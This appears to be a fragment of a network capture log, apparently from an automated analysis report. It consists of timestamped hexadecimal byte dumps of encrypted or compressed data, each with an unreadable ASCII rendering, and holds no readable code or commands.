                                                                                                                                  2022-05-12 17:41:27 UTC44INData Raw: 93 84 61 de 8e f6 f7 fe 76 dc 61 72 4f ae 79 ff aa b8 0c f5 41 27 1b ff fb ef 9f 35 1d 1c 19 21 d3 a0 ac 71 aa e1 1a b6 16 74 f7 54 e9 88 5d fe 69 e4 73 32 29 ad d4 10 66 57 ef 90 f8 4f b8 d7 64 ba ea e8 d3 c0 5b d5 40 b3 27 1d df f8 cd 16 f9 1a 26 84 c6 75 71 67 40 dc e9 66 06 77 a1 03 af ec 57 be e0 29 aa f0 9a 54 48 e1 6c 04 79 07 70 00 1d 98 e8 92 ad 31 01 67 2b 35 0d ce f9 b5 ca 0f 5a 54 74 7b a9 41 88 fd ad 32 1c c4 44 ec e3 97 17 7d 2d a9 1b 13 01 a9 05 a9 ba 4d f2 7a 07 35 56 4d 6c 80 41 50 1e a0 80 f0 d2 d1 30 a2 3c 40 33 7f e1 9a 3e 90 2a 3e 5b 20 55 0e 86 d4 a1 8d e2 36 93 62 b6 ba 36 88 96 9f bb 2f eb 11 33 4c bb ca 6c 9b 40 fe 5e 99 38 27 16 64 90 bc b0 b8 3f 51 13 13 1d 5d 24 bd a2 d5 9a 4d 57 c9 3f ca d9 06 63 4f e4 dc b1 54 0b 98 d7 7f 66
                                                                                                                                  Data Ascii: avarOyA'5!qtT]is2)fWOd[@'&uqg@fwW)THlyp1g+5ZTt{A2D}-Mz5VMlAP0<@3>*>[ U6b6/3Ll@^8'd?Q]$MW?cOTf
                                                                                                                                  2022-05-12 17:41:27 UTC45INData Raw: 7f ef 2d 04 85 66 a8 c6 2b 65 66 88 e8 eb 3e e0 01 39 1b ab e2 ca a3 47 63 38 e3 45 73 58 86 14 ca e5 30 43 2d 35 6f cd 41 ba 43 99 1a 24 74 05 4e ed 79 3a ca f8 93 56 bc 56 ee f1 ae 59 3d 83 bc af 38 d5 71 63 ce 77 e6 05 6a ad 9c 50 d8 e4 90 6b 4a fb 4a 07 9d c7 4d 52 75 65 d1 68 3c 2d 0d ff 4f a6 9f 54 f4 c2 cc a8 9a 33 28 42 54 1e 9a 48 a8 bf d2 5c ce 5d fc 43 b8 e5 21 c7 3e f4 20 b0 ab 35 5b 14 6f 5e 0b b9 72 6c 51 04 7f 18 23 2e 7e 20 2c 77 98 76 17 31 0c 17 d4 6e 23 fe 05 40 e0 07 75 c5 36 6b 53 a2 fa f5 b3 27 81 e6 d4 ce 6d c8 61 ca 80 b1 84 33 e9 57 4a de b8 e7 c6 40 11 df 4b 64 3c 43 e0 53 05 89 d4 9c 8d e4 0c 01 1d 14 85 c3 1f 40 b7 2b d0 03 cd 06 9f cf f6 c6 fa e2 fc 2b 59 70 5c e5 b5 54 8e b1 bf a9 af 11 90 11 10 0d ed c0 08 6c e3 93 e2 b4 d5
                                                                                                                                  Data Ascii: -f+ef>9Gc8EsX0C-5oAC$tNy:VVY=8qcwjPkJJMRueh<-OT3(BTH\]C!> 5[o^rlQ#.~ ,wv1n#@u6kS'ma3WJ@Kd<CS@++Yp\Tl
                                                                                                                                  2022-05-12 17:41:27 UTC46INData Raw: a4 25 6c c8 04 38 9c 2d 93 f5 dd 83 20 55 22 a9 af 78 87 ca 1c 49 0d 01 66 b4 82 94 e4 66 0f ef 95 31 37 5b b0 6f 8e 23 53 92 98 32 01 70 8b 8f be ad ed 12 51 13 11 36 54 ca 55 4c ed bf 65 af c3 3d a3 3a 13 64 25 ef f2 b1 54 01 46 d7 75 26 99 cc b8 c0 81 9b f0 26 7a 70 95 b2 db 2a 94 df e0 b7 75 22 17 6c 00 4f 48 91 59 a4 d6 8f 57 d8 ef 74 0d c9 bc 40 91 91 68 ec 10 b0 3b 55 48 a5 93 f8 ab 6d 97 ab b8 cd d6 df 90 97 cb e4 6f 89 21 bc 2f 58 a0 7c 2e 66 a4 95 f1 f8 92 26 35 eb cc 56 df 90 2b 6d 55 a4 9c 5e bb db ea 8e 66 43 1e da c9 38 bf 6e 1b 95 5f b7 d5 a4 d8 5b de 85 d7 41 2f 47 f6 2d ce 44 19 a6 87 27 46 da e3 82 b6 3e 50 6e 8b 23 c3 21 25 44 87 bb 99 47 e0 60 4f 06 db 62 f4 93 d3 47 c3 99 f9 b9 32 27 6e c7 ef ff bb eb ee a3 aa b0 53 38 65 25 f7 d4 83
                                                                                                                                  Data Ascii: %l8- U"xIff17[o#S2pQ6TULe=:d%TFu&&zp*u"lOHYWt@h;UHmo!/X|.f&5V+mU^fC8n_[A/G-D'F>Pn#!%DG`ObG2'nS8e%
                                                                                                                                  2022-05-12 17:41:27 UTC48INData Raw: f7 c2 fd 8f de 9f cd a7 b6 f5 f3 e3 7f 2b cc b1 fc dc 43 09 a7 8a 7f 3c 58 f7 92 27 66 dc 9c 84 f7 14 65 68 d1 84 c9 c9 5b 9b 34 ff 10 d7 1a 8e d4 eb ca ea e3 80 1f 49 77 46 33 a6 5f 93 bc f7 b3 a3 67 8a 02 19 f3 ec ec 15 5e f7 98 a3 df d4 23 6e 5b 05 f4 91 53 b6 58 0c eb 7d e4 2b 3b 5b 7a fd 88 eb d8 13 3a 11 fa db 30 f6 e4 3a 15 a7 52 23 be 1c 6d b1 e4 87 d4 a7 56 ed b8 44 14 68 ce e0 ec 30 07 71 77 6e 61 28 6e f8 75 dd ff 8b 7d 61 d6 94 08 f6 d2 66 dd 0c a9 4d 20 ca d0 2f 0d 4b db 40 27 17 39 16 ef 97 23 e1 66 e2 23 c4 a8 80 50 b3 09 66 4d 14 5f f1 7d 61 f2 ae fe 69 e0 6a 79 f8 ad d0 10 64 2c bc 90 f8 5a a4 c8 64 ba ea da 65 90 59 d5 9b 2b e1 1c df f0 b4 d0 f5 05 6a fe 23 5f 73 6f 13 c5 e8 66 08 0b 66 00 87 19 2a 66 e6 3a a9 e8 9f 21 8e f1 e1 2f 7b 7c
                                                                                                                                  Data Ascii: +C<X'feh[4IwF3_g^#n[SX}+;[z:0:R#mVDh0qwna(nu}afM /K@'9#f#PfM_}aijyd,ZdeY+j#_soff*f:!/{|
                                                                                                                                  2022-05-12 17:41:27 UTC49INData Raw: e2 1f 4a f8 3a b2 73 1b 95 f4 b4 d5 ec f5 35 68 87 02 5f 2f 47 fb 36 fe 41 19 4f 87 27 46 a6 e3 82 a1 3a 70 60 e0 20 c3 12 c5 45 f4 6b 97 47 ea 6b 55 05 b4 b1 e7 a3 dc 4b 44 b3 fd 99 b4 a7 6e d6 b9 50 bf d3 6e a1 d9 61 52 29 6b 32 16 95 22 e4 bb 91 22 2d 72 98 c0 eb ea 1f 34 40 7e a7 57 e5 d9 1f 5d f0 ce 45 47 d9 e1 11 76 d2 8a 8d a1 b9 7b 69 b1 56 c1 fa 21 49 fe 19 31 44 fb 66 87 d6 56 39 b6 c7 36 0a 75 75 36 18 c6 4d 16 6d 6d d9 3d 3e 9f 17 a0 c1 5a 7d 53 92 e8 c7 3f ec 19 2c 0b 6c f5 d8 42 58 5c 28 e1 5d 40 ce 94 ea c1 c2 20 41 22 2f a8 da 5c 5b 56 a6 02 33 76 1a 50 02 7c 0b 3e e8 b4 4e 41 40 dd 95 58 b5 d9 8b 87 b4 34 ef 83 62 93 7e f7 14 6d a9 a7 d4 ce f7 9f 4c 1c ec 51 07 8c cd 5d 5c 82 9a fc 4e 0e 37 1c 31 c6 85 91 46 e7 d3 1c b5 81 2c 1f 94 41 32
                                                                                                                                  Data Ascii: J:s5h_/G6AO'F:p` EkGkUKDnPnaR)k2""-r4@~W]EGv{iV!I1DfV96uu6Mmm=>Z}S?,lBX\(]@ A"/\[V3vP|>NA@X4b~mLQ]\N71F,A2
                                                                                                                                  2022-05-12 17:41:27 UTC50INData Raw: 38 6c 0a 45 44 88 5b be c7 88 5f ab d7 8a 0c e5 97 42 b9 d6 29 b7 32 77 12 f2 42 8d 56 e8 ad 65 ae 47 a8 db da c4 90 86 ca e4 63 8b 2e 4a a5 70 8d 76 5d 42 8d bb f7 f2 87 e4 26 f2 41 68 d0 8f 20 b9 45 8f bb 4d a1 ca ed a6 ac e3 1f 40 e7 31 a3 7c 1b 84 51 a8 c5 12 db 19 4b 96 d1 44 b5 6f e6 36 fe 4b c9 43 87 27 5d 8e f7 82 a7 30 58 c0 0b 23 c9 66 38 46 f4 70 8b 4e f5 7a 5b 0a b4 a1 fb 8c d6 b5 ca 9f f0 88 3a bf fe fe ed bd 44 14 f1 b1 ca 6e 52 29 60 32 16 95 22 e0 ad 9e 8f d4 7f 83 d2 fc ed 15 23 57 80 b7 74 fc d1 81 51 c5 d2 50 4d d0 7f 2e 99 d3 a6 84 aa ae 60 71 b3 5d da 15 2f 78 10 1f 0a 23 30 da 86 9a f3 07 b6 c7 3d 0d 77 75 3d 18 c6 46 16 6d 6d d9 3e 2d 9a 6b 38 ee 2a 84 84 89 f4 d4 3a f1 1b 27 14 6e 0f c0 85 c2 70 23 e3 40 b8 c5 95 ea ca e1 2e 52 26
                                                                                                                                  Data Ascii: 8lED[_B)2wBVeGc.Jpv]B&Ah EM@1|QKDo6KC']0X#f8FpNz[:DnR)`2"#WtQPM.`q]/x#0=wu=Fmm>-k8*:'np#@.R&
                                                                                                                                  2022-05-12 17:41:27 UTC51INData Raw: da 97 9c 3c 3c b5 e8 fd fe 3c 1d ac 25 8f bf 30 74 a0 6e 21 d2 46 0a 3a af 94 10 b9 52 c8 fd 34 10 6b 6a ec d6 4f a3 07 74 fb f6 4d 6b 70 db e1 1a f6 fe 7c d7 75 43 4e ae 77 0f 7f b0 6a 29 47 2e 72 7f 1a ef 95 e9 18 4f 87 21 d3 ae aa 58 a8 f7 66 7d 16 74 f1 56 ba f5 9e 9e 69 ee 71 49 fd ad d6 14 6a 2c 5f e0 f8 41 d7 17 65 ba fb e1 49 c0 21 d5 9d 03 a1 1d df eb a2 c4 8a f3 23 91 ff 53 00 8f 3a 0e e3 6b 00 63 99 02 af e2 39 60 93 fd af f2 86 3a 94 f0 69 11 7d 13 7d 01 1d 96 ef a4 94 5c c1 1b f7 3f 1c cf ca 53 10 0c 21 87 77 53 43 42 f3 24 be 36 09 ae ea 34 e2 9d cb 13 f3 b8 1c 06 07 c4 cd ad 34 fe 9f db de 35 5c 42 9c a3 52 2e a2 4c 81 f4 da a3 89 4f 3d 44 3b d8 e6 90 37 b8 2e 4c ec 7d 55 0a 8e 73 70 8a 8d fa 48 0d 01 91 36 82 95 f8 6e 2f e9 15 0f 37 72 92
                                                                                                                                  Data Ascii: <<<%0tn!F:R4kjOtMkp|uCNwj)G.rO!Xf}tViqIj,_AeI!#S:kc9`:i}}\?S!wSCB$6445\BR.LO=D;7.L}UspH6n/7r
                                                                                                                                  2022-05-12 17:41:27 UTC52INData Raw: 86 cf 40 47 ce e9 05 f6 c2 a7 8e b3 d4 11 69 a0 56 df 0d 31 61 e6 16 a8 99 37 f9 55 00 db 10 a5 c1 26 00 7f 98 31 12 d1 65 1d bb 91 f7 32 3a 87 7b 24 51 30 7a 7a 5e 22 c6 35 fb 79 c7 0a 7d fb bb b5 73 70 23 f0 64 6e 47 e4 ea cb c9 b0 52 26 3e af d3 49 a1 43 9c 13 27 73 36 93 13 78 10 d3 ed 89 48 7c bb e6 e4 a1 66 31 ab 50 b6 27 d9 9e 66 6e fc f7 14 ef 81 6c c4 d8 ee e3 9b 40 e8 5b 7d 85 cb 88 54 5d e9 d2 62 2d 27 04 2c 5f a9 91 43 f6 dc 42 0e 93 2f 12 94 96 32 8f 66 7d ba c3 52 da b2 f4 59 a7 a6 e0 ef c3 fc 33 a1 a5 1c c4 89 6f 4f 11 8e ad 93 50 22 01 f5 33 25 5c 31 3c 72 b8 7a 08 24 0c 3c d1 7f f9 e0 1e be 6a 2b 7f c5 2b 62 8f 89 43 eb af 34 9a f7 cf ca 7d 20 9e e7 ab a9 95 2a fd 6f 32 d5 b8 fc df 4f f0 c9 74 75 2d 56 c1 87 2b 77 d5 ae 90 ec 1d 1b 3f ce
                                                                                                                                  Data Ascii: @GiV1a7U&1e2:{$Q0zz^"5y}sp#dnGR&>IC's6xH|f1P'fnl@[}T]b-',_CB/2f}RY3oOP"3%\1<rz$<j++bC4} *o2Otu-V+w?
                                                                                                                                  2022-05-12 17:41:27 UTC53INData Raw: 65 7b ad 49 23 22 ad 32 03 83 91 ed e3 97 e9 a0 f4 a9 11 63 0f d2 dc b2 44 42 f0 01 ab 39 56 49 59 b2 6b 7a cd a0 8a f3 bf 62 e7 a2 36 4e ef 14 1d b2 13 94 28 4f 8e 34 5f 22 aa af 78 87 3c 32 4f 27 0b bb 36 c3 88 e4 6e 2f eb 15 31 37 68 ca 6c bc 2e 3c 5f ba 33 0b 1f aa 8e be a7 d8 e8 51 12 0c 15 4a db 69 5c fd b7 c3 57 c3 2c d6 fd 07 63 43 c0 fa a5 7c ff 44 d7 53 71 4f e8 b8 c0 80 88 f4 37 8e 59 cf 38 fc 2e 80 c1 7f 52 a2 af 32 64 14 66 a4 85 48 b7 d0 14 57 b4 cc 75 1e cd ad 44 87 a6 a4 76 38 7e 3b f7 53 89 48 ed 83 95 87 af a3 d3 c4 ee b8 6d cb e2 7e 17 21 62 3c 71 9e 78 3f 68 9a bf 53 e9 9c ec 21 d5 b3 78 df 9a 22 53 6c a2 b5 5f a1 cc 67 89 66 e2 1e 59 fc 2b b4 65 0c 19 9c b7 d5 ed 78 24 6c 93 cf 74 dd 46 f7 3c f6 55 31 4d 84 27 40 b0 6e 85 a7 3a 71 74
                                                                                                                                  Data Ascii: e{I#"2cDB9VIYkzb6N(O4_"x<2O'6n/17hl.<_3QJi\W,cC|DSqO7Y8.R2dfHWuDv8~;SHm~!b<qx?hS!x"Sl_gfY+ex$ltF<U1M'@n:qt
                                                                                                                                  2022-05-12 17:41:27 UTC55INData Raw: 43 10 4e b1 11 8a 6b 91 de 9f 7b 02 e4 ff 45 4f 32 55 81 71 08 35 14 13 f6 81 39 cd 18 95 2f 34 5c c7 36 71 94 ba ee f9 51 35 b6 eb c6 5b c5 d7 87 1d 76 ac 82 3d f6 6c 2a df a9 e6 ca 16 f0 c9 74 73 35 43 f2 72 f0 8b 2a 4f 9c a3 0e 01 35 c0 8f dc 2a ad b0 18 f4 13 df 11 58 45 fa ce 1b a3 c3 2a 48 6a 4d 2c 96 a1 90 90 a5 8a 7d 01 8b 0e 06 c2 ff e7 06 7f f9 82 34 de f8 26 19 9f 1e f6 8c 5f 8c 32 13 cc 9a 1b 06 1a 56 f6 5c 86 e5 0c 47 9e 3d 3b ea 23 f7 fe 27 1e b0 69 23 be 1c 75 b0 63 27 01 b8 f2 3f b0 ba 10 b5 43 de e7 2f 33 84 6f 4e 68 18 b3 f8 8b 0e e2 a5 62 6a de 9f fd e8 bf 88 df 36 8c 48 c1 60 d2 a1 bc 64 6a 5c 26 1d 24 75 1b 9e 35 15 70 14 4e 26 a5 80 52 a0 98 47 60 16 72 ec 14 ef fe 84 ef 62 ff 45 b7 fc 81 f2 1d 73 fa 3a ff e5 4a d7 11 62 d5 fd d0 4d
                                                                                                                                  Data Ascii: CNk{EO2Uq59/4\6qQ5[v=l*ts5Cr*O5*XE*HjM,}4&_2V\G=;#'i#uc'?C/3oNhbj6H`dj\&$u5pN&RG`rbEs:JbM
                                                                                                                                  2022-05-12 17:41:27 UTC56INData Raw: 8e 87 af d8 d0 c0 be 01 a8 e4 69 90 0e 41 3c 70 87 13 4c 6c 8c b1 d7 fe 8e fe 5a 05 40 79 d5 ff d3 46 44 a9 90 74 f8 ca ed 92 55 b8 1d 31 fd 3b b0 77 08 98 48 a4 d9 c7 fa 24 65 96 d7 cd 3c 42 f1 1e fa 42 19 49 96 22 ca 89 e3 82 a6 55 87 61 0b 29 e5 03 38 51 22 78 94 56 e6 7a 45 8b 03 82 2c 9b f1 4c c8 b3 fb 9f 59 c4 6e c7 a5 6b 98 eb ee ab b6 03 52 38 65 0e ee 82 08 83 4a 8f 02 f1 10 7a d2 ef e0 28 32 23 84 a7 7b e7 a9 85 51 e9 d7 52 49 e3 f2 14 86 fb 5d 8f b9 a0 6c 6f a8 43 dc 6b 35 65 ee 14 49 ff 21 d1 9a 26 c9 18 9e 3b 36 06 63 4b d2 c6 d9 5b 04 6d 7a e0 32 3c 8d 12 f5 d7 30 70 a7 74 92 c5 34 f1 0e a4 31 7d f1 c3 a3 69 fc 19 e3 54 6a 28 68 eb cb c3 16 5e 2e 07 b1 dd 4a a3 38 e8 01 24 6f 38 58 7c 1b 16 c0 e3 b2 4d 7a 45 e5 ec a7 07 27 b2 d3 b5 29 df 8f
                                                                                                                                  Data Ascii: iA<pLlZ@yFDtU1;wH$e<BBI"Ua)8Q"xVzE,LYnkR8eJz(2#{QRI]loCk5eI!&;6cK[mz2<0pt41}iTj(h^.J8$o8X|MzE')
                                                                                                                                  2022-05-12 17:41:27 UTC57INData Raw: 1c 84 6f 4e 42 22 02 01 75 f1 f9 bb 59 60 de 88 e0 fe 8a f4 de 1a af 4d d5 71 d2 a1 be ed b2 5b 0f c3 23 1a e5 84 26 12 67 df 2c cc a9 7e 59 84 fd 76 64 01 a2 e0 53 e3 fb 97 f3 69 f1 7c 56 eb 53 d5 38 48 3d 36 84 d0 1a d5 17 63 ad 6d d6 4d c0 5a c6 91 12 2b 0b ce fc ae 55 d1 0b 22 91 ff fd 62 69 2f 1a fe 70 2a 85 60 02 a5 f9 3d 75 ed 29 bf ff 90 d7 90 cd 66 08 0f 70 a8 00 06 96 e3 b2 81 33 07 17 ef cb 0c e6 c5 3e b3 01 20 8d 70 f5 1a 59 25 39 77 25 ce 26 aa ed e3 9c cc 19 e7 a4 1b 06 0e cd d0 57 bb 65 c7 07 ce 30 50 58 47 28 cf 04 cd a0 81 fc c7 27 e1 a2 3c 45 22 03 29 9d 28 85 2d c9 d2 20 55 0b 26 be 7f 99 ca 0d 48 0d 01 93 c9 83 94 ee 46 2f e9 15 3b ab 77 c7 7f 92 2f 2d 52 86 26 f5 1e 96 80 af a1 d2 72 79 02 17 25 49 d7 5d 48 ee ba 4d 46 ce 22 b4 d7 07
                                                                                                                                  Data Ascii: oNB"uY`Mq[#&g,~YvdSi|VS8H=6cmMZ+U"bi/p*`=u)fp3> pY%9w%&We0PXG('<E")(- U&HF/;w/-R&ry%I]HMF"
                                                                                                                                  2022-05-12 17:41:27 UTC59INData Raw: cd 35 7d 67 67 32 1c c0 26 dd 92 6c ff 30 47 98 7c a8 d3 28 15 a3 77 e9 cd 37 8a 04 29 0b 79 9e 2a bd 59 7a 20 f5 57 e6 f0 fa 30 ca c9 30 58 f8 3c 9c f6 67 a5 57 80 0a 23 0a 1a 52 13 72 65 c5 eb 98 46 10 43 cf ee a7 4a 27 93 ad b4 27 df 8f 62 aa 32 f7 07 f3 a9 a7 c4 c3 d4 94 74 1c e8 51 07 1b dc 52 52 89 1f f3 63 2d 22 00 46 8b ac 80 4c e5 a2 c2 b8 81 28 00 d3 89 33 8f 6a 6c c5 dc 57 cc 48 f2 3d 76 8b f7 cd 3c 85 3d a6 b4 1c 50 60 b7 4e 10 ac 64 e9 5e 29 72 1e 5d fc 57 4b 27 74 84 79 86 93 70 d6 d5 7f 32 eb c0 ad c4 03 52 d4 3d 7b 8e b6 9e ee ad 34 90 95 c0 d7 72 d4 e5 cd 86 bf 86 22 e3 6f 21 df b8 ed d5 52 46 80 58 6c 21 52 fb 4d 38 47 d7 b0 ae e6 1d 0a a7 d1 84 d2 03 58 9a 2f ff 17 c1 f8 8f f8 eb d2 0f e3 d7 37 b6 7a 6a 31 b1 54 91 bb b4 4c ae 2c 89 25
                                                                                                                                  Data Ascii: 5}gg2&l0G|(w7)y*Yz W00X<gW#RreFCJ''b2tQRRc-"FL(3jlWH=v<=P`Nd^)r]WK'typ2R={4r"o!RFXl!RM8GX/7zj1TL,%
                                                                                                                                  2022-05-12 17:41:27 UTC60INData Raw: 6a b5 40 2b cb 88 55 f4 d0 a0 89 41 3d 44 3b 02 10 97 3d 94 2e 3b b6 21 55 0e ac a1 7b 8d e4 1a 9c 0d 0b b1 59 61 95 e4 64 29 c3 1a 32 37 6e b4 59 9e 2f 38 77 89 31 0b 19 92 ad be a7 cf 87 b2 12 17 2f 45 f3 53 5e fd b1 33 62 c2 3d a1 01 14 60 49 ca da 92 54 01 4c b8 b6 67 c2 e5 be e8 92 98 f0 20 f4 7a cd 9a e9 02 80 d6 57 a6 8b 7a 38 6c 0a 21 b8 86 48 bb c1 b1 45 b7 cc 72 73 fc bd 40 95 99 3e b4 38 78 12 80 42 8d 56 96 48 66 86 a5 af f3 c7 c5 b8 68 b5 d1 68 9a 22 4a 24 73 8d 7a 06 b9 8c bb fb 97 7b f9 35 f7 47 51 c6 93 2a 41 3a 96 b7 5f a3 f3 f0 8d 66 e4 37 9f f8 3a ba 1c f8 94 5e bd d3 c4 c1 36 68 81 a5 69 2e 47 f3 1e e2 42 19 49 af 04 46 a6 e9 ed 44 3b 70 6a 0d 0b de 11 34 40 8a 5e 99 47 ee 43 56 06 b4 b6 dc 46 d9 4b c1 dc 1e 98 36 ad 68 ef b0 40 bb ed
                                                                                                                                  Data Ascii: j@+UA=D;=.;!U{Yad)27nY/8w1/ES^3b=`ITLg zWz8l!HErs@>8xBVHfhh"J$sz{5GQ*A:_f7:^6hi.GBIFD;pj4@^GCVFK6h@
                                                                                                                                  2022-05-12 17:41:27 UTC61INData Raw: 57 8e 3e 71 83 99 d2 ea af 3e f5 05 c4 d5 78 d9 b7 90 af bf 80 0a a5 7c 21 d9 90 cf d5 52 04 e0 04 7c 3c 54 d3 6f 2b 77 df df 60 e7 1d 00 32 f9 d9 c0 15 55 99 73 fc 10 d0 2e ac d4 e9 c0 2c bd d3 21 4e 53 65 33 a6 55 fe 5f ad b2 a5 07 e4 00 1b f3 e6 83 09 6c f2 92 d9 d8 ff 40 20 5c 2d f5 85 5f 97 35 0b eb 0b d7 2b 17 5f 75 e2 a7 c4 da 9d 87 14 26 f1 79 f5 d6 7a 14 af 4c ce bb 21 7a 3d dd 26 e6 13 f0 3f bc 97 15 ad 4b e4 c5 21 0f 6b 66 f8 72 26 68 00 72 d9 de 93 71 6b cd 8b e7 f2 d6 4d de 1a a4 63 a7 6c d6 a9 b3 4b 4e 40 27 1b 33 12 f8 49 26 17 76 c6 30 da 2a 37 6a 67 e5 60 49 07 76 f3 5c d1 61 5a f0 7b e7 8f 5f e5 ad d4 0f 0b 71 3d 90 f2 97 fd 16 75 ba e0 d3 4d 40 5a a8 60 02 29 1d df fa b6 d4 c9 1e 22 83 f4 5f 73 fb 3b 0e f8 64 06 30 9a 03 af e0 45 2c e0
                                                                                                                                  Data Ascii: W>q>x|!R|<To+w`2Us.,!NSe3U_l@ \-_5+_u&yzL!z=&?K!kfr&hrqkMclKN@'3I&v0*7jg`Iv\aZ{_q=uM@Z`)"_s;d0E,
                                                                                                                                  2022-05-12 17:41:27 UTC62INData Raw: 29 47 42 cc a0 5d a7 d1 fb 8b 4e 85 1c 4a fe 55 a6 71 1b 9f 3e 9b a1 fa 57 1a 68 87 da 4f 25 4e df 5e fd 41 1f 20 46 27 46 ac ea aa b0 38 70 6a 64 3b c1 12 3e 6e cd 6b 98 4d b5 47 5c 0c 9c a7 f6 93 d3 24 d3 b1 fd 93 1e f7 6f c7 a9 50 b1 c0 f9 a8 f1 76 50 38 65 47 f1 96 0e e6 dd 96 00 fb 75 ab 83 ee ea 08 23 52 a8 90 7a e3 cc 6e 56 f8 d4 69 22 cb e5 00 e7 07 a7 8e bf c5 2d 69 a0 58 cb 0e 08 34 ef 1e 20 3d 24 fa 85 11 dd 07 bf ef 52 05 69 60 5d cc d6 49 0c bb 3e f4 32 3a 85 78 b9 d3 18 9b 7b 76 e3 ea 0a e0 0d 00 ea 7d f1 cb 91 6f 61 26 cf 66 1b 7c 94 ea cd da 31 43 2d 3e bd b1 0b a4 57 8c 10 2f 74 19 3f 2e 79 16 c6 f8 93 5d 6f 2a da ef a7 4c 37 88 ae db 64 de 8f 64 e4 6b fc 7b 29 a8 a7 cf 06 eb b5 5c 6c e8 51 0d 9f d0 7a 6d 8b 64 f7 bc 2d 37 1e 3e 8a be 89
                                                                                                                                  Data Ascii: )GB]NJUq>WhO%N^A F'F8pjd;>nkMG\$oPvP8eGu#RznVi"-iX4 =$Ri`]I>2:x{v}oa&f|1C->W/t?.y]o*L7ddk{)\lQzmd-7>
                                                                                                                                  2022-05-12 17:41:27 UTC64INData Raw: 4f 1c 22 10 fc 9b 28 0c 62 ce 30 d6 b2 7e 59 84 f4 70 72 13 74 e2 53 e3 e5 7a ff 45 e2 5a 4c c5 14 2a eb 9b 2a 17 8e fa 63 cc 27 61 ba 5e d9 4d c0 fd d5 9d 12 38 01 f7 2e b6 cf f3 16 51 84 f7 5f 79 76 3f 7d f2 64 02 12 6a 04 87 8b 29 66 e6 36 b4 da 58 29 91 eb 44 0c 78 7c ae 28 c8 9c fe ab 9b 40 0a 18 f7 3f 62 d7 d0 3c c2 0b 09 e3 77 7b ab 4b db 3a ae 32 1e 83 50 ed e3 97 d6 73 e8 ab 1b 1d 6c cf de a9 b0 4f d8 1a dc 35 50 41 6a d6 40 2b cb 88 55 f4 d0 a0 f1 d1 20 46 31 0e 57 87 3c 94 22 43 ab 50 56 0a 82 a7 50 9b e1 32 4f 25 de bb 36 88 83 97 72 2d eb 1f 5e 2a 6a ca 66 99 07 23 5c 99 34 03 37 9a 8d be a1 ed 3d 51 13 1d 32 30 c7 40 5d f7 d8 50 55 c3 37 a3 01 11 60 49 ca fa 99 4c 02 46 d1 7d b3 c2 ef b2 d7 f2 87 f2 26 80 20 d1 98 ed 20 92 fd 26 a3 a3 a9 30
                                                                                                                                  Data Ascii: O"(b0~YprtSzEZL**c'a^M8.Q_yv?}dj)f6X)Dx|(@?b<w{K:2PslO5PAj@+U F1W<"CPVP2O%6r-^*jf#\47=Q20@]PU7`ILF}& &0
                                                                                                                                  2022-05-12 17:41:27 UTC65INData Raw: c1 b6 4a 62 0b cd 54 68 4d 4b ea da cd 12 38 27 2f bf b1 6b a7 57 80 df 2b 40 36 7d 13 78 1c d3 fa b0 62 6a 45 ef 30 a7 5b 22 ab c5 b5 27 d9 e0 43 e0 7a fd ca e1 8c 8f e8 d8 e4 9a 67 55 c0 7f 07 8c d6 8c 43 9a 60 d5 3a 2c 26 11 46 7d af 80 4c 39 d6 e9 91 ac 2c 04 b6 46 27 a7 4e 6e be d8 88 cc 5d f3 7a c1 8b f7 c1 51 df 31 a7 be c6 47 2a 47 62 10 a6 6c 81 46 00 5c 1a 32 2f 88 4b 3c 73 ba 06 09 24 19 63 f5 7d 38 eb c0 b1 c4 03 52 d4 3d 7b 96 a6 d9 c4 af 34 90 38 c5 c4 76 f6 f8 ca ac b9 e9 03 e0 7f 2b 01 b7 c8 fd 7f 0e c8 52 6c 24 7a d5 4c 2b 7d 0b b0 92 e2 35 6e 34 d1 82 ac 34 51 b1 3e 21 1f f3 2e a3 d4 e9 c0 17 fa f8 0f 48 7b 4c ed a6 4e 95 94 2f b3 af 06 e4 2f 1b f3 e6 32 09 4b da b5 ca df de 30 28 73 2b e5 87 55 43 39 1d e7 4c 8b 2b 17 53 17 ca 8d fd d0
                                                                                                                                  Data Ascii: JbThMK8'/kW+@6}xbjE0["'CzgUC`:,&F}L9,F'Nn]zQ1G*GblF\2/K<s$c}8R={48v+Rl$zL+}5n44Q>!.H{LN//2K0(s+UC9L+S
                                                                                                                                  2022-05-12 17:41:27 UTC66INData Raw: 9d 95 0e ea dd af 00 fb 75 5d dc ca c2 23 30 58 8a b5 5c cb e8 7f 50 e3 03 41 56 cc cd 51 89 d3 a0 e1 98 a8 7f 63 7e 5d ff 2c 0d 65 ee 14 35 06 09 ff 90 00 d1 c8 b6 d6 33 2e e8 67 32 1e b8 68 08 93 66 2b 3d 19 be 50 a8 d7 3a 69 52 5e c7 c7 35 fb d4 28 1a 79 d9 a2 bd 59 76 4c c2 56 68 4d 4b e5 ee e1 17 52 26 25 aa f4 62 8b 57 8a 0b fa 65 0f 54 3b f4 17 c0 ef f7 6d 68 45 ef 30 ab 62 0b 83 ad be 0f f1 8f 62 e8 a4 f7 05 ea 81 2e c4 d8 e2 ff 55 43 e8 5b d9 83 f9 7a 6e 8b 64 f7 71 06 0e 39 29 5c a7 5e 46 f6 dd e4 e0 80 2c 02 d3 74 30 8f 6a b0 b1 f7 7e e1 4c f7 58 b3 a6 df e9 3e fe 39 79 b4 09 4c 27 eb 4e 10 a0 09 b3 52 28 78 c4 3d 00 7e 66 2d 77 98 69 25 0c 31 0c d4 75 e6 e1 0f ba c9 49 7e d4 3b 05 9e b1 f1 f1 c0 15 98 e6 cf 0b 7d fb b7 e6 ac bf 8c 31 cc 57 0f
                                                                                                                                  Data Ascii: u]#0X\PAVQc~],e53.g2hf+=P:iR^5(yYvLVhMKR&%bWeT;mhE0bb.UC[zndq9)\^F,t0j~LX>9yL'NR(x=~f-wi%1uI~;}1W
